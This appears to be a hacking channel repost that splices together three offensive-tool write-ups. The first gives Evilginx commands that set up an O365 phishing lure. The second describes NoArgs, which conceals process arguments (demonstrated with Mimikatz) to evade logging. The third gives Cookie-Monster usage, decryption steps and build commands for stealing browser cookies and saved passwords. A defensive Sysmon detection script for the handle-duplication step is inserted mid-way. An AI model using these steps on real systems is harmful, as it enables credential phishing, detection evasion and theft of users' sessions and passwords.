Channel: Ethical Hackers Vol. 2
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set the Evilginx blacklist mode to NoAdd to avoid blacklisting Apache, since all requests will be coming from Apache and not from the actual visitor IP:
blacklist noadd

Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use a Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO
Create script(s) to automate most of the steps

Download Frameless-Bitb (https://github.com/waelmas/frameless-bitb)
NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected
http://www.kitploit.com/2024/04/noargs-tool-designed-to-dynamically.html
NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking Windows APIs to manipulate Windows internals on the fly, which allows NoArgs to alter process arguments discreetly.
Default Cmd:
Functionality Overview
The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism
Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows function calls to be redirected to custom implementations while preserving the original functionality. By hooking CreateProcessW, the tool is able to intercept process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation
The Process Environment Block (PEB) is a data structure used by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:
Process Hacker View:
All the arguments are hidden dynamically.
Process Monitor View:

Technical Implementation
Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for the obfuscated executable on the releases page.)
Windows API Hooking: Detours is used to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.
Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.
PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to manipulate or hide the process arguments.
Execution Redirection: Once the manipulations are complete, execution returns to Command Prompt (cmd) without any interruption. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that rely on getting the process details from the PEB.

Installation and Usage:
Option 1: Compile the NoArgs DLL. You will need Microsoft Detours (https://github.com/microsoft/Detours) installed. Compile the DLL, then inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.
Option 2: Download the compiled executable (ready-to-go) from the releases page (https://github.com/oh-az/NoArgs/releases/tag/releases).

References:
https://en.wikipedia.org/wiki/Microsoft_Detours
https://github.com/microsoft/Detours
https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++
Download NoArgs (https://github.com/oh-az/NoArgs)
Cookie-Monster - BOF To Steal Browser Cookies & Credentials
http://www.kitploit.com/2024/04/cookie-monster-bof-to-steal-browser.html
Steal browser cookies for Edge, Chrome and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files and download them. A separate GitHub repo is referenced for offline decryption.
BOF Usage
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID || --chromeLoginDataPID || --edgeCookiePID || --edgeLoginDataPID ]

cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444

cookie-monster Options:
--chrome, looks at all running processes and handles; if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles; if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json files
--chromeCookiePID, if the chrome PID holding a handle to Cookies is already known, specify that PID to duplicate its handle and copy the file
--chromeLoginDataPID, if the chrome PID holding a handle to Login Data is already known, specify that PID to duplicate its handle and copy the file
--edgeCookiePID, if the edge PID holding a handle to Cookies is already known, specify that PID to duplicate its handle and copy the file
--edgeLoginDataPID, if the edge PID holding a handle to Login Data is already known, specify that PID to duplicate its handle and copy the file
EXE usage
Cookie Monster Example:
cookie-monster.exe --all

Cookie Monster Options:
-h, --help   Show this help message and exit
--all        Run chrome, edge, and firefox methods
--edge       Extract edge keys and download Cookies/Login Data file to PWD
--chrome     Extract chrome keys and download Cookies/Login Data file to PWD
--firefox    Locate firefox key and Cookies, does not make a copy of either file
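The Chrome and Edge modes described above depend on one observable step: a process that is not the browser opens a chrome.exe or msedge.exe process and duplicates its open handle to the Cookies/Login Data file. As an added defensive example (not part of Cookie-Monster or the original post), the Python below scans Sysmon Event ID 10 (ProcessAccess) style records and flags non-browser source processes that obtained PROCESS_DUP_HANDLE on a browser process. The flat key=value record format, the paths and the access values are constructed for the example; the field names follow Sysmon's schema and the access-right constant is the documented Win32 value.

```python
from typing import Dict, Iterable, List, Tuple

# Win32 process access right needed to call DuplicateHandle on another process
# (documented SDK value). PROCESS_ALL_ACCESS masks such as 0x1FFFFF include it.
PROCESS_DUP_HANDLE = 0x0040

# Browsers whose Cookies/Login Data handles the BOF description targets.
# A browser's own child processes legitimately open each other, so a browser
# source image is not treated as suspicious.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}

# Constructed Sysmon Event ID 10 (ProcessAccess) records in a flat key=value form.
# Field names follow Sysmon's schema; every path and value here is made up.
SAMPLE_EVENTS = [
    "SourceImage=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    "|TargetImage=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    "|GrantedAccess=0x1FFFFF",
    "SourceImage=C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe"
    "|TargetImage=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    "|GrantedAccess=0x1440",
    "SourceImage=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetImage=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"
    "|GrantedAccess=0x1000",
    "SourceImage=C:\\Users\\alice\\Downloads\\update.exe"
    "|TargetImage=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"
    "|GrantedAccess=0x40",
    "SourceImage=C:\\Windows\\System32\\rundll32.exe"
    "|TargetImage=C:\\Windows\\System32\\notepad.exe"
    "|GrantedAccess=0x40",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'k=v|k=v' record into a dict. A real pipeline would read the
    EventData elements of the Sysmon event XML instead of this flat form."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_handle_theft_candidate(event: Dict[str, str]) -> bool:
    """True when a non-browser process gained PROCESS_DUP_HANDLE on a browser."""
    source = image_name(event.get("SourceImage", ""))
    target = image_name(event.get("TargetImage", ""))
    granted = int(event.get("GrantedAccess", "0"), 16)  # accepts the 0x prefix
    if target not in BROWSER_IMAGES or source in BROWSER_IMAGES:
        return False
    return bool(granted & PROCESS_DUP_HANDLE)


def scan(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (source, target, granted access) for every flagged record."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if is_handle_theft_candidate(ev):
            hits.append((ev["SourceImage"], ev["TargetImage"], ev["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for src, dst, access in scan(SAMPLE_EVENTS):
        print(f"review: {src} opened {dst} with {access} (PROCESS_DUP_HANDLE set)")
```

Two of the five constructed records are flagged: the Temp\svc.exe open with 0x1440 (which carries the 0x40 bit alongside query rights) and the Downloads\update.exe open with exactly 0x40; the Task Manager query with 0x1000 and the browser-to-browser open are not. In production the source side needs an allowlist of endpoint agents that legitimately open browsers with broad rights, and this rule only covers the handle-duplication step: the subsequent read of the file through the duplicated handle produces no further ProcessAccess event, so the Firefox mode, which just reads profile files by path, is not visible to it at all.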
Decryption Steps
Install requirements:
pip3 install -r requirements.txt

Base64 encode the WebKit master key:
python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File:
python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chrome/Edge Passwords File:
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation
Ensure Mingw-w64 and make are installed on Linux prior to compiling:
make

To compile the exe on Windows:
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
TO-DO
Update decrypt.py to support Firefox based on firepwd (https://github.com/lclevy/firepwd) and add a bruteforce module based on DonPAPI (https://github.com/login-securite/DonPAPI)

References
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI

Download Cookie-Monster (https://github.com/KingOfTheNOPs/cookie-monster)